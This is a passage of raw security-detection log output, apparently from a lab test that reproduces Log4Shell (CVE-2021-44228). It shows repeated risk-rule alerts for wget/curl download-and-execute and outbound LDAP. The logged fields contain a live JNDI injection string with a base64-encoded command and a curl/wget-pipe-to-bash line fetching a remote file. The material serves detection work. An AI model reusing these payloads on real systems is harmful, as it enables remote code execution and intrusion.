Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645154, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="T1190", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645154, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="T1190", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 3", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like HTTP headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 3", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like HTTP headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint 
